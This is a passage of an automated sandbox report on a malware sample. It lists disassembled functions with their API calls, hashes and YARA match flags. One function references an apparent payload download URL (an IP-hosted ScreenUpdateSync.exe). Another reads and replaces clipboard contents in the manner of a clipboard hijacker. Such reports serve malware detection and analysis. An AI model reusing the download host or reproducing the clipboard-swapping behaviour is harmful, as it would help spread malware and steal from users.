                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessagePostProcQuitWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3873111417-0
                                                                                    • Opcode ID: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                    • Instruction ID: f7540e8b067131d9abd8b97533556e050534cde561c52fa9c46de49641595c4f
                                                                                    • Opcode Fuzzy Hash: 1f3d487c3c03d627e5903ad7b0a4cc32456bcc0014a944db875e3b1801701b52
                                                                                    • Instruction Fuzzy Hash: 91410C15A64384A9E730EFA5BD15B2537B0EF64762F10253BE528DB2F2E3B58580C30E
                                                                                    Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Sleep.KERNEL32(0000215D), ref: 00401562
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                      • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$Sleep
                                                                                    • String ID: http://176.113.115.37/ScreenUpdateSync.exe
                                                                                    • API String ID: 3358372957-2681926500
                                                                                    • Opcode ID: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                    • Instruction ID: a225884332a17bf582b8fadba65ee921369c39f73c189ef0fca73ca0a6338174
                                                                                    • Opcode Fuzzy Hash: ddfdc33ddaf944cd93ee91cdfc7456df5d56f708170e8b920f6740c66972ae79
                                                                                    • Instruction Fuzzy Hash: 6E318C15A6538094E230CFA5BC66B252330FFA8752F51253BD60CCB2F2E7A19583C71E
                                                                                    Function 009E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(00000400,?,?,009E0223,?,?), ref: 009E0E19
                                                                                    • SetErrorMode.KERNEL32(00000000,?,?,009E0223,?,?), ref: 009E0E1E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction ID: 518bfefd04ff1fa04a4c66aeaa9b8635698d5129f672d08a57038237baf20c59
                                                                                    • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                    • Instruction Fuzzy Hash: D1D0123114512877D7012A95DC09BCD7B1CDF09B62F008421FB0DD9080C7B0994046E5
                                                                                    Function 004341A6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                    • Instruction ID: c13f0aaa9ffca533a2c3afb5b433fd4ee60c85f45f94f80d5c2ee7b15d17ea23
                                                                                    • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                                    • Instruction Fuzzy Hash: 2051C331A00218AFDB10DF59C840BEA7BA1EBC9364F19919AF809AB391C735FD42CB54
                                                                                    Function 004036C4 Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fread_nolock
                                                                                    • String ID:
                                                                                    • API String ID: 2638373210-0
                                                                                    • Opcode ID: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                    • Instruction ID: b9260250dbf28f9d15b3c818f63209514cdecf0a47afbf9c4decfe0e49894dcf
                                                                                    • Opcode Fuzzy Hash: 2283a06a2fad5c3ceff95e800cd0e8c9cbaa35fb85d12550c614d86d70b6a1f3
                                                                                    • Instruction Fuzzy Hash: 95316AF5604716AFC710CF2AC880A1ABFA9BF84351F04C53EF84497791D739DA548B8A
                                                                                    Function 00402843 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402926
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Ios_base_dtorstd::ios_base::_
                                                                                    • String ID:
                                                                                    • API String ID: 323602529-0
                                                                                    • Opcode ID: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                    • Instruction ID: 06a190b1af6bffd0b30009583d7beab466b865d2b1cdf6d05da26eaaeda62aaf
                                                                                    • Opcode Fuzzy Hash: ac15786566c7c12d7d6604bc2b543ac292efb61edc09540775426cdd15f97b46
                                                                                    • Instruction Fuzzy Hash: E3312CB4D002199BDB04EFA5C891AEDBBB4BF58304F5085AEE415B3681DB786A48CF54
                                                                                    Function 00403CE7 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catch
                                                                                    • String ID:
                                                                                    • API String ID: 3886170330-0
                                                                                    • Opcode ID: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                    • Instruction ID: 130d185d73aa858ab00e75432ddc36e19440830dd378bf412e93c481dd82f4d6
                                                                                    • Opcode Fuzzy Hash: 8f7dc48dcb05c21fbbcda5fcf12e76a98b4592d37682d1b18d39cb0d63f71a47
                                                                                    • Instruction Fuzzy Hash: 98215870A00245EFCB11DF55C480EAEBBB5BF48704F2480AEE805AB391C778AE50CB94
                                                                                    Function 004327A5 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wsopen_s
                                                                                    • String ID:
                                                                                    • API String ID: 3347428461-0
                                                                                    • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                    • Instruction ID: 247e0a556512b48f7b921b083965eca1f7392b8622cfa12ec24d1c2ccd616764
                                                                                    • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                                    • Instruction Fuzzy Hash: B511067590420AAFCB05DF58E94199A7BF4EF48314F10406AF809AB311D671EA158BA9
                                                                                    Function 004336C7 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000000,0040D895,00000000,?,004267BE,00000002,00000000,00000000,00000000,?,0040CD46,0040D895,00000004,00000000,00000000,00000000), ref: 004336F9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                    • Instruction ID: 8b2e0ce5f68243881f48833c9379da8a786ec54fae66de81054fb87b7da3eb6a
                                                                                    • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                                    • Instruction Fuzzy Hash: C9E0E5B1A046207ADA302FA65C06B5B3A48AF497B2F056133FC0592290FF2CDE4081AD
                                                                                    Function 0040FB31 Relevance: 1.5, APIs: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 004103E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw
                                                                                    • String ID:
                                                                                    • API String ID: 2005118841-0
                                                                                    • Opcode ID: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                    • Instruction ID: f0ff8e4b9f7cc01ea46f57855d09a1922a3c0907516a33a9cf8cca3f22e82038
                                                                                    • Opcode Fuzzy Hash: d3dc0e7b799cf4addcb5e854e1870d6270b50bfba89a80199028074021f20c37
                                                                                    • Instruction Fuzzy Hash: E8E02B3050030D76CB107A65FC1195E33381A00328F90413BBC24A14D1EF78F99D858D
                                                                                    Function 0043CD2A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(00000000,00000000,?,0043D105,?,?,00000000,?,0043D105,00000000,0000000C), ref: 0043CD47
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                    • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                                    • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                                    • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                                    Function 007F9F0D Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 007F9F5E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 007F9000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7f9000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction ID: 1f2a496c7f09bad51c6f8feb3860f414b141df697e465d2a09ffcb8527491044
                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                    • Instruction Fuzzy Hash: 3A112B79A00208EFDB01DF98C989E98BBF5AF08350F058094FA489B362D375EA50DB80

                                                                                    Non-executed Functions

                                                                                    Function 009E1947 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 151clipboardsleepmemoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __EH_prolog3_GS.LIBCMT ref: 009E1951
                                                                                    • Sleep.KERNEL32(000011EB), ref: 009E195B
                                                                                      • Part of subcall function 009ECE9C: _strlen.LIBCMT ref: 009ECEB3
                                                                                    • OpenClipboard.USER32(00000000), ref: 009E1988
                                                                                    • GetClipboardData.USER32(00000001), ref: 009E1998
                                                                                    • _strlen.LIBCMT ref: 009E19B4
                                                                                    • _strlen.LIBCMT ref: 009E19E3
                                                                                    • _strlen.LIBCMT ref: 009E1B27
                                                                                    • EmptyClipboard.USER32 ref: 009E1B3D
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009E1B4A
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 009E1B74
                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 009E1B7D
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 009E1B84
                                                                                    • CloseClipboard.USER32 ref: 009E1BA8
                                                                                    • Sleep.KERNEL32(000002C7), ref: 009E1BB3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                    • String ID: 4#E$i
                                                                                    • API String ID: 4246938166-2480119546
                                                                                    • Opcode ID: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                    • Instruction ID: bc60d0e9da0fcd23b58369616d09205ac37d3602d09fcc21d8453abe8d39a73d
                                                                                    • Opcode Fuzzy Hash: 5a18581ab405ad27caf1df7c8ac30ba184fa26a46bc7722f265aab5c590d64ee
                                                                                    • Instruction Fuzzy Hash: B551F230D003859AD312DBA4ED067FD7768FF6A306F045229E841A6163EBB09E85C769
                                                                                    Function 009E237D Relevance: 22.7, APIs: 15, Instructions: 205nativeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 009E23B8
                                                                                    • GetClientRect.USER32(?,?), ref: 009E23CD
                                                                                    • GetDC.USER32(?), ref: 009E23D4
                                                                                    • CreateSolidBrush.GDI32(00646464), ref: 009E23E7
                                                                                    • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 009E2406
                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 009E2427
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 009E2432
                                                                                    • MulDiv.KERNEL32(00000008,00000000), ref: 009E243B
                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 009E245F
                                                                                    • SetBkMode.GDI32(?,00000001), ref: 009E24EA
                                                                                    • _wcslen.LIBCMT ref: 009E2502
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 1529870607-0
                                                                                    • Opcode ID: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                    • Instruction ID: d01aaa3541d0101d934262924fc01f64380dfe15797f62a950024aaed59df442
                                                                                    • Opcode Fuzzy Hash: be0766d7ae0c697a5dba668a9829c24405f9e4c1de05ebb10b7902c4c9583b03
                                                                                    • Instruction Fuzzy Hash: F171DC72900218AFDB229F64DD85FAEB7BCEB09751F0041A5F609E6155DA70AF80CF24
                                                                                    Function 0043B78E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B827
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BAAD,?,00000000), ref: 0043B850
                                                                                    • GetACP.KERNEL32(?,?,0043BAAD,?,00000000), ref: 0043B865
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction ID: 27c07f44f4bcc92ed5b0bc77b7acbdc5106fd624739a874395cd08b17b137cf5
                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction Fuzzy Hash: 39210336A00104A6E738AF14C801B9773AAEF58F64F56942BEB0AD7310E736DE01C3D8
                                                                                    Function 00A1B9F5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00A1BD14,?,00000000), ref: 00A1BA8E
                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00A1BD14,?,00000000), ref: 00A1BAB7
                                                                                    • GetACP.KERNEL32(?,?,00A1BD14,?,00000000), ref: 00A1BACC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction ID: 3ba3b810cc75335bd2d21baec8994d0a51e35c4589db703a6e6328875d0c3976
                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                    • Instruction Fuzzy Hash: B1217F32624205ABDB348F64D901AE773A6EF94FE0B5A8564E94AD7110F732DEC0C7B0
                                                                                    Function 0043B962 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F59
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F66
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA6E
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAC9
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAD8
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307D5,00000040,?,004308F5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB20
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430855,00000040), ref: 0043BB3F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 2287132625-0
                                                                                    • Opcode ID: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                    • Instruction ID: 67f71bbb56b82b0218cba6ea78e0e4499e3cf24bce0f2bcc9fbcefe2be7f4072
                                                                                    • Opcode Fuzzy Hash: a50431d0c3642f69d47dbab6daefb570278e327c2e745941eee8886a4e92d2d5
                                                                                    • Instruction Fuzzy Hash: DC517371D00609ABDB10EFA5CC45BBF77B8EF4C701F14556BEA40E7250EB789A048BA9
                                                                                    Function 00A1BBC9 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A121C0
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121CD
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00A1BCD5
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00A1BD30
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00A1BD3F
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,00A10A3C,00000040,?,00A10B5C,00000055,00000000,?,?,00000055,00000000), ref: 00A1BD87
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00A10ABC,00000040), ref: 00A1BDA6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 2287132625-0
                                                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                    • Instruction ID: c9e36ecbf8b9d2b3f35dc1b517b5b84d54957e8df0c78c6c1f4f2c6ed822d0c3
                                                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                    • Instruction Fuzzy Hash: 78518F71A10209EBDB10DFA5DD41AFEB7B8BF08700F144569E905EB190EB719A84CBB1
                                                                                    Function 0043B02A Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00431EFA: GetLastError.KERNEL32(?,?,0042E005,00457910,00000010), ref: 00431EFE
                                                                                      • Part of subcall function 00431EFA: _free.LIBCMT ref: 00431F31
                                                                                      • Part of subcall function 00431EFA: SetLastError.KERNEL32(00000000), ref: 00431F72
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307DC,?,?,?,?,00430233,?,00000004), ref: 0043B10C
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B19C
                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B1AA
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307DC,00000000,004308FC), ref: 0043B24D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                    • String ID:
                                                                                    • API String ID: 2444527052-0
                                                                                    • Opcode ID: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                    • Instruction ID: 5761a74378df300ed92098e1ccfc665780a6f2e5d92530a12aea1ed3de9efe0d
                                                                                    • Opcode Fuzzy Hash: 235cd7c9c97d69f00393a381e4b6a272d6827e4b9def7e09cf33ed6baaba58e2
                                                                                    • Instruction Fuzzy Hash: BF610C71600205AADB25AB35DC46BBB73A8EF0C744F14256FFA05DB281EB78DA40C7D9
                                                                                    Function 00A1B291 Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00A12161: GetLastError.KERNEL32(?,?,00A0AA0C,?,00000000,?,00A0CE06,009E249A,00000000,?,00451F20), ref: 00A12165
                                                                                      • Part of subcall function 00A12161: _free.LIBCMT ref: 00A12198
                                                                                      • Part of subcall function 00A12161: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 00A121D9
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00A10A43,?,?,?,?,00A1049A,?,00000004), ref: 00A1B373
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00A1B403
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00A1B411
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00A10A43,00000000,00A10B63), ref: 00A1B4B4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                                    • String ID:
                                                                                    • API String ID: 2444527052-0
                                                                                    • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                    • Instruction ID: 2ec99b1bce37c6f255ec13dbd7efe7dcc645d4323cc3533dbb25b24e5c9d86f8
                                                                                    • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                                    • Instruction Fuzzy Hash: A4610571610206AAD724EB75CD42BFB73ACEF04700F14802AF916DB582EB74E99187B1
                                                                                    Function 004351E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430233,?,00000004), ref: 00435233
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
